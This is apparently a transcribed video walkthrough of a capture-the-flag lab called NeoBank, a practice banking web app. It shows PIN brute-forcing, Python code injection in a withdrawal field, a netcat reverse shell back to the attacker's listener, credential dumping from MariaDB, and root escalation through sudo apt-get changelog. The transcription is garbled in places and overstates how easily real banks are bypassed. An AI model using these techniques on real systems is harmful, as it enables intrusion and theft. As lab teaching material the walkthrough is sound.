Hello guys, welcome back to Dependency Club. Today we're going to solve another CTF challenge name called a NeoBank. So it's like a real type of a CTF, but we are doing on the fintech technologies on the banking system. We targeted as some of the virtual environment only, similar like a bank. So how we would like to access and how we would like to track, how we would like to bypass the uh, QR code authentications and XYZ things. Everything we can see here as in detail here. So first we just type here as sudo su, enter your password, then you just type here as net score minus I is 0. So first of all, I have identified my target machine is here. So this I privately hosted. I'll just type here as nmap minus 34 minus a and I press scan and enter. So you need to one think before very carefully. Banking applications are otherwise any type of applications. They're not hosted in Apache or Nginx, otherwise anything else. So their hosting is cost effective and they're not hosted in some particular ways. So now you can see here work jig HTTPD and Python version is 3.7.3. So there is totally a different, and their hosting is not like where you can take it with Namecheap, GoDaddy, Hostinger, Bluehost, GoDaddy, XYZ things. So they not host in this manner. So they host in typically a different way, and that hosting is also a cost effective. Not like if you put like $100 or $200 per year. So that is totally a different. Now, if you would like to look here, so first we would like to walk to the directory here. So this is the banking directory. So where you can look here, this we would like to look a pesos. In the pesos, we not get any useful information. That's it. A login. That's it. An email and text. A password in the password field. Okay, that was a little bit great. So we have identified here. Now, we would like to do here as a first as fuzzy. So you just entirely just copy this one. Now let's come back here. Now let's just open a new tab. Now just type here as ff. Now just type here as minus c minus u for let you just paste this and you specify the word list is a user a share word list. Just type here as a directory poster, then you just type here as a directory list 2.3 medium.txt. That's it. Now I just need to put as here I would like to put here as minus t as 100. I would like to ignore the comments. The progress is a duration is 0, where we not yet get any useful information. So I think where we have made any type of mistakes here, we just try progress one or one job. There is nothing else to identify. Otherwise, if this is not coming with the fuzzing, I just type here as directory buster and let it paste it your thing. Then we can identify from here. What else we can get it from here? This is more important here. Now let me would like to look here. So once we try with the fuzzing, it not get. Now we would like to look from here. So it may take a little bit time, and this may take a long lengthy time process to process all this. So we need to look very carefully all this. So where I have got it as login and logout along with now let's see here. So, but I not yet get the right thing. Where I have made a mistake here. Let me, I would like to show you in the fuzzing, because in the fuzzing only the right thing we can get it from there. Then we would like to go from there. Now let's come back here. So here it may taking a long lengthy time process. So now once we just type here as no, it's not coming. Now let it wait here. So we have identified only two things, only a login and logout. That's it. We don't yet get any type of QR codes or XYZ things from apart from this. So that's it from here. Now let me, I would like to try here as, so I just need to mention here as pushing here. So that's why I have failed here as push to mention. Now I have get here a somewhat a useful information. So now you can see a login. So I just leave it this one to put a somewhat type. Now let's come back here. Now even if you type here as a login, this may be no, this may be a not as an invalid. Now let it we just leave it here as logout. We have got in that. Uh, now let we can get it that one. Now just look here as we would like to look in the pesos. In the pesos, we just uh, have a email. So in the means an email. So we have found a email list from here. Now just type here as a email. I just type here as a list. So where I have found the email list. So if you have time, you can entirely just write down all the email lists however you like. Like if you want to entirely just copy, so you just entirely just copy this a email list. So where we have identified all the email lists, so let me, I just paste it here. So we just close this and this. So this was a little bit somewhat clumsy. Now just let me close this. So I would like to close this everything. Now let me close this. Now we would like to just I would like to write this one very clear. So if go with the command prompt, it may take a long lengthy time process for this one. So I just write all the email list back, come back. So you just write here as a email list. That's it. You just click on save. That's it. You just close this. Now let me just come back here. So where we have got it here, now just type here as a cat a email list, where I have email list here as presented. Now we would like to try as a OTP. Now let's come back here. Now, we would like to look here as a come back here. So, where we have found the email list. Now, email you just write here as a test at the rate a email.com. Pin is 1234. Now, I would like to inspect the elements, go to any network. So, I just drag here, go to any network, then click on try to log in from here. So where you can see here 200 it was okay. Where you get a session ID from here, accept, then you can look here a request, a response is nothing because it's not valid one. So there is 404 not found. The request URL was not found on the server. If you enter URL manually, please check on spelling and try again. Now we would like to write the right we need to write a uh, useful pins. So just I would like to dump from uh, rocky.txt user share a word list, then you just type as a rocky.txt, then you just type grep, then you just type here as 09 star 029 dollars. I just close this. Now you just type here as a possible pins. That was done. I just type here is word count a list a possible pins. So here I got almost all 2 million uh, password list. So we can't able to execute that one to go and crack that one. So it may take a long lengthy time process. Uh, Now we just look also as we just look. So it may not be going to be happening that one. Now let me just close this. Now what we just try here as so we are going to look here. Now let's come back here. Now I just write the as a list. So I have here a bullet post.python. I just copy this one. I just write it as a Python 3, a bullet post.python. Now I can look here a email list and a pin list. Okay, that's great. Now we need to look here. I just write it as nano a bullet post.python. So I need to change to my targeted IP address in the URL, replace with your actual URL. So 192.168.18.178, and this is for a login. That's it. You just type Control O, Control X. Now I would like to show you this payload which I was written. We just type it as uh, Python. So this is the entire of the source code. Requested system signal uh, from a PWN import, then importing a PWN tools for logging in the process, where we define the exploit for email and pin, where here have a email and pin for exploitation. Now URL of the target replace with the actual URL, and email for email and pin for a pin, where we have set up the data. Yes, for a request the session, and or for a session to post the URL and data, and check the login is successful based on the response. If length are equal to a cookies, then login successful. A valid email or pin is found, then return to a true. Then otherwise, if not a login is successful, then return to a false. Then definition handlers a sig frame a print in the new line as existing line. A system is echoes. Then we define again a main class, a signal and signet and handler. So we have present the handler if length of the system uh, agreement. Print uses of Python 3 and system argument of email list and pin list with system access and read email list email file equal to my system argv. Now just try again with open email file r as f for accept the file not found a print f email file not found email file and read the pin list. Now we have everything here clearly. Now we would like to look from here. Now we just need to look. Now I want to decrease. Now just come back here. Now just type what called a possible list. Now I want to decrease this one. Now just type here as a cat uh, possible pins. Then you just type grep. Then I just specify minus x. Now I just need to get a printout, only a small one. 6. I just write sponge. Okay. So we just need to install this more utils. So once we this installed, I just write yes. Now let it install this one first, then later we would like to go to another one. Now this was a install. Now just type here a sponge where which was building everything number. So let it wait for this. So it may be built around how many wordless we don't know. So we want only the pins. We don't want etc things. That's it. So it may be a print almost all. Let we can look here. So it may take a long lengthy time process also this one to print here. So where I have got here everything. Now we just try here as now I want to print entirely this one in the a possible uh, pins. Now that was done. Now just type here as a cat a possible pins. Now I just type here as word count list. I have a 30,000 almost all uh, 400,000 list I have available. Now just type clear. Now we would like to look here. I have 400,000 almost all words. So I just put here as GDP input Q. So why it's not work out? So it's no have, so I just need to install. So uh, let me just install this. So we have all our possible word lists. Now we can look it out here. From 2 million to we have reduced that one almost all very less. Now let me just try this. So once this is installed, now we just try as another one. Now let me just come back here. So where this was done, now just type uh, GDB input Q. No, we just don't need this one. Yes, just type here as exit. So we don't need this GDB. Now just type here as a cat, a possible pins. Now I just need to a sort. So where it was a sorting everything, this was done. Now we just need to look something here as I just need to quit this. Now let me just type clear. Now just type sort. Just type unique queue. So after sort unique minus C. Now let we would like to look here. So where a unique identity will be there, then it will be find out. Now this was so where let it be done this one very unique queue way. Then later we can try as another one. So let it come. So let it come until the 9, then we would like to go for as another one. Now this was done. I just type clear. Now just type here as a cat, a possible pins to a sort. Then I would like to put as sponge. Then you just type here as to a possible pins. That's it. Where we have gone. Now we would like to try here. Now we just try here as a word count list a possible pins, so that's only have. Now I just type here as a python 3 a bullet force dot python. You just type here as email list, then we just type here as a possible pins. Now let me just try here as a pip install a pwn sudo apt get install pwn. So this was an error now. So how we would like to sort it out this one. So we have an error to verify this. So now I just type here as type list, email list. Now if you enter as a Python 3, now brute force dot Python, and I just enter. So to enter this one, it's not going to be present here. So let it be. I just type here as clear. Now just type here as sudo apt get update. So first let me update this one. Then later we just try to go a further to attack this one. So again, I just try to update this one. Now this was done. Now I just type here as a Python 3 minus a version. Let me just look here. I have found my version. So now I want to install sudo apt get install. Uh, then you just type here as a Python 3. You just type here as a Python 3 virtual environment. Now just type yes here. So when we now have virtual environment, the exploit which we was created that will not going to be worked out. So this is installed. Now we would like to try here as, now just type here as sudo apt get install. Just type here as a virtual env. You just type here as Python 3 virtual env. Python 3 a virtual env. Now just type yes. That was installed successfully. Now just type from here as clear. So sometimes you will get a lot of errors. So you just need to be an also to be a solve a problematic also. Now just type here as Python 3 minus f uh, virtual environment as a virtual. I would like to mention as anything as a my wish here as this one. Now we would like to look here. Now we just type here as list a virtual PCPL. So now just type here as source a virtual PCPL. Then activate, where I have activated now the virtual environment. Now just type here as a Python 3 brute force.python. Now just type here as no module name as requester. So just copy, you just type here as pip install a pwn. So this we would like to install this one first. Installing a build dependencies. So where if this is was done, now later we just go for as another one. So this may take a long lengthy time process to process this type of CTFs, but we need to try with very patience. Now once this is done, now we just try here as another one. Now this was done, I just type here as now this was done. Now just type list. Now just type here as a Python 3, a brute force dot Python. You just type here as email list dot unpassable pins. Now the brute force is trying to crack the passwords. You can see here with the possible pins. So, but it may take a long lengthy time process to uh, accept this as a results. Now we just look here. It may take a long lengthy time process to uh, get all these things. Now let me I just utilize as another thing as uh, I don't like to go that I have almost all 400,000. Now let me I just quit this. Oh, it quit this entirely. It was quit. Now it's okay. Now let's come back here. Now you just type here as a cat a possible pins. Then you just come back here. Now you just type grep version. So I just need to print as version as 0101. Then I just put here as 00. Then 111, 222, 333, 444. So I just put until like 88, 555, 6, 7, 8, 9. Now just type it as spongy. Just type it as a possible pins. Now where I have got it here now a possible pins. Now I would like to utilize here word count less a possible pins. So now it was reduce almost or less. Now let me I would like to utilize as type before. Before I would like to get as early as possible without wasting a time. So I just type it as a Python 3. Now I just type it as a brute force dot Python. Now you just type it as email list. Then what we supposed to need to use here as a possible pins. So where we get as an error this one it was existing where a CPU is used and real it was used. That was a little bit great. Now you just type here as source which will be activate. Now we just entirely take this uh, command and copy. Now just enter. So where I have got I think so I have got the already the password. So where trying with this one it's not get out. Connection is aborted by the peel. Now I just try clear. Now I just try again with the possible pins. Bullet forcing trying with. So let it try this one. Now I hope this one maybe can can get cracked out. So we just look here. So I think where we not yet get here 0 1 0 1 2. So just try clear. So we just need to try again. So if we not a try, we going to be a fail. Now let me just try here. So in any one of the targeted things, so we can get it out from here. Now just close this. Now just try again. Now where it was error. Now let me just try here as one more time. Our possible pens. So I would like to try here as with an email list using with the one or one. So I would like to change the ending one. Then it will be write a perfect one. So it may not get the right proper way. So there is no attribute for a remove. So okay, let me just type here as clear. Now one more time. So we just try this as one more time. Now so if this may not be a workout, I would like to try the last time with an Python. Then later we just try. So this is not workout. Now just type here as a with a Python one. Now let's come back here. Now just try this. So it may be take a long time. Now let we would like to look here. Brute forcing trying with an Jesus. Now later we just try this. Now just come back here. Now let me just try here as a cat a emailless.txt. So I would like to utilize as this one as the right one. Now just copy. Now let me just look here. So it may take a long lengthy time process to crack all those passwords. So better we would like to utilize as that in front of that a tag, then that is well and good. Otherwise it may take a long lengthy time process. We can't able to tolerate all those things here. So it take a time consumptions like how you can crack a bitcoin.wallet.file. This also a more than that. So we would like to try as with the same thing as same one password utilizing this one. Otherwise we can change. Now it's coming with Apollo. It may take a 202 or 203. That's it here. Let's wait how long it may going to take this one. Then we can get it out. Now it may be a refusing. Uh, we can try here connection by fuel. Uh, by So let it be. I don't want to go ahead too much. So if you have a time, you just try this. So this is an email. So just copy. Then let's come back here. So we just log into anthony@neobank.1. Now let's come back here. So the password is where we have the password is this one. We just copy, come back here. I just press it here. Now let's come back here. And I would like to put here as pin, then try to log in. We just look in the inspect elements, go to a network. So it was an invalid. It's a 4044 not found. So if it not found, I just need to put as 202. So we just need to go in the right format way. Now let's come back here, press the email, uh, come back here. So where you can create the right thing also, it's not going to be workout even if you use a chat GPT. So this type of applications is not by made by coding, or it's somewhat a difficult way. Okay, now let's come back here. Now we just put as A203. Now let's come back, just copy, come back, paste it. Now let's come back here. Now let me, I just copy, come back here and paste it. Where now I have login here. So how can I verify this a two-factor authentication? So this is a major point in any type of banking system. So how can I verify if a two-factor authentication? So a two-factor authentication is mandatory for every banking or any financial sectors. Okay, so where we have identified our foods from here. In this, so just close this. In this, have OTP. Just copy this one. Now let's come back here. Now just go to here as we just type here as a OTP. Let's we would like to look here. We not yet get as OTP is a similar way. Now we can look as a QR code. So I have got the QR code. So in this QR code, so you can scan with your Google Authenticator, otherwise Microsoft Authenticator, otherwise Oracle Authenticator. You can scan this Authenticator and you can add the Authenticator. So there is an everywhere as an backup. So you just add Authenticator. So I have got it the I can't able to show in my phone, but I have got like in if you scan with the Google Authenticator, you just get like a NeoBank dot one and email address as Anthina at the rate a neobank dot one. That's it. So this is how you can get it. There is an 6 digits code. Now let's come back here. So I have got the two authentication factor is 899 553. Then you just click on verify. So this is how you can bypass very easily of any type of the banking systems. Now we have bypassed this one and we have got it here as an welcome. We can see a welcome. Then we have seen here as a withdraw. Now let me, I just start with an verb sort. You just type here as verb sort. I just click on OK. Now your account name is Anthina, NeoBank.1 now. Your account balance is 340. How much? It's pounds or dollars. Let's we would like to look from here. Let us start this box out. So it was a very hard way to crack this one, to bypass, otherwise to bypass the security firewalls or XYZ things. Now we just go to here as proxy. Now just so little bit. We would like to go back here. So we just came back here. Welcome to your account name is Anthony at the right NeoBank one now. Your account balance is 340. Enter amount you want to withdraw. I just want to withdraw a 10 pounds, otherwise $10. So you just click on submit. I just got a withdraw where I have seen here. Now, now my balance is 330 pounds. Okay, let we can do this one. So we just try here as a plus, otherwise I just type here as plus $10. I just try to send. Now this is it's same now. Your account your balance is minus 330. Now it was a 330. Now, I would like to request through an website. Now, I just click on intercept with the website. Now, I just come back here in the proxy. Just click on the website. Now, I just intercept with the website here. Now, I just put here as a 1, otherwise a 10. Now just click on submit, where I have submitted here. Now send to a repeater. Once you get in the repeater, now you just try to send this one. Now we would like to look in the response. What else we can get here? Now here we got here is a 330 where we have got here in the render. We can look it out from here. We got here. So now I just need to put here as we got it here. So I would like to utilize a if you put here as a ID, we just try here as something like we would like to put here internal server is error. That's great. So I just need to put here as a import. So I just need to put a Python a source code. I just type here as a OS dot a system. Now I just need to get a ping -c enter our targeted IP address 192.168.18. So what is my targeted IP address? So let's just come back here. I just type it as config is 167. Now I just come back here is 67. Now I just come back here. Now I just type it as sudo atcp down. I just need to verify where I can get in a ETH0, then ICMP. You just type enter our password. Now listening as Ethernet. Now let's come back to here. Now where we just need to close this. Here is a ping. That's it. Now just try to set. Here I not yet get a listening here. In this we can look here internal server error. Now just come back here. It was ETH0. This was an ETH0 only. Now we would like to come back here. So ping see what, then you just try here. No, it not even getting here. So I just need to copy this. So let's just copy. I would like to search by a Google this one. Let's come back here. So here I not get anything else. So here we are not getting any type of a ping written back to here. Now let me just try this. So without giving us a gap here, now let we just try here as one. Now we just try here. So I think I would like to write from here as a beginning. Now just come back here. Now just type here as a import. Now just type here as a OS. Now just come back here. I dot a system. Now just type here as a ping C1. Now just enter our targeted IP address 192.168.a67. Now just close this. Then try to send. Now this was a send. So we have a successfully executed. So but here I not get a response here. Now again you can try here one more time to send this, where I also not get a response here, where it was listening with an sharp snort, but it was not listening here anything else. That's great. If we not get any type of listening also, it was okay. Now we just try here as come back. Let me just quit this. So just type as netcat minus lvnp. I just put as 4444. Now let's come back here. Open here as a pentest monkey. Now let's go to a pentest monkey. Now go to a cheat sheet. Now go to an reversal cheat sheet. Now just take this entire, just copy, come back here. Now let me just try here as let it just paste here. Our port is at 4444. Now just type here as 192.168.18.a67. Now just come back here. You just need to put as here a bin bash minus c. Then you just put here entirely this one. That's it. So entirely just copy. Now let's walk to the here a verb suit. Now just close this entirely where it have control V. Now let me just try to set. So here we have found a little bit mistake. Now we just need to just like what we would like to make here. So now we can look here in this, so we not at get. Now let me just try here as bin bash minus c. So we just need to uh, print this until get. So this must and should be as encoded, otherwise we just try here It was internal server error. So how we can do this one? So we can try this one as so we have failed here. So now we would like to analyze where is the error. Now we would like to look in the render internal server or error. So if this is failed, now I want to write a simple as command here. Now I just want to delete entirely this one. Now let me just go back here. A system. Now I just need to put here as a netcat. Uh, then enter our target IP address 192.168.18.67. Then you just put here as 4444 minus E. You just type win sh, then that's it. Now try to send. I have get a connected here. Now you can see here we have connected. Now just type ID. We got here as a ID. Now just type here as a which Python. You got it here. We just type here as Python minus C import apty span bin bash. I have got it here. Now just type plus minus here. So I just put here as export tab equal to extra. That's great. Now just type clear. Now just type plus minus here. Now just type here as a here, nothing else here. Now just type here as a cat a main.python. In this a main.python, we would like to look here is something as useful information. Now we would like to look from here from a flask. It was written here. I have got it here as uh, where I have got it is MariaDB. In this, you can look here the username and password which we was filter here. A username is banker. Just copy. Password is NeoBank1. That's it. Now let's come back here. Now just type here. Now we just try here as uh, MySQL username as a banker. Password is enter the password. NeoBank. So what is the password is NeoBank1. That's it. So where we have login here. Now just type here show databases. Now you just type use bank. Now just type show tables. Now just type select a star from account where I have got it all the accounts available balance along with their PIN. So where we have identified this one. Now we just try here as a select a star from system. So where I have got it with a banker and advise me. So this is available list, email list. So just copy, come back here. So if I make it big, so this is a email list enter of this bank, a database. There are 12 customers, their PIN, and there is deposit available balance, XYZ things. Now let's come back here. Here. Now this is the main banker user ID and password. So just copy. Now let's come back here where we have this here. Now we already know this one. Now I just type here as a exit. Now I just type city home. Now I just type plus minus L. So I just type SU a banker. The password is advise me. Just copy, come back and paste. So where I have got here, now just type plus minus L. Just type city a banker. Now I just type plus minus L. So I just type here as a clear here. Now I just type plus minus L. Now I just type here as cat a user.txt where I have find the user flag. NeoBank user is owned. I have found now here. Now I just type here as a sudo minus L. Where is apt get? Now just come back here. So let's walk to a GTFO bins. So in the GTFO bins, you just type here as apt get with a sudo. We would like to utilize as sudo apt changelog apt. So I would like to utilize this one. You just paste it. What is the password of the this one? Let's come back here. So this is a advice.me. So just copy, come back here. Sorry, the user banker is not allowed to execute user bin apt a changelog to apt as a root or NeoBank. So this was a little bit complicated here. Now let's come back here. So which one we would like to put here? So we are at the end of the movement. Save this. So uh, here, let's wait. We just need to enter here is something. So I just need to enter a manual way. So uh, so in this, I just enter sudo apt get a change log apt. Now it was given a console. Now just enter here as a bin or sh where I am in the root directly. Now just write id. We are in the root directly here. You can see here we are in the root access. Now just type cd a root. Now just type plus minus l. Here we have. Now just type cat a root.txt. That's it. A root flag is game. So we have successfully completed this mission. That's it. So you try your own guys. Thank you guys for watching and keep smiling.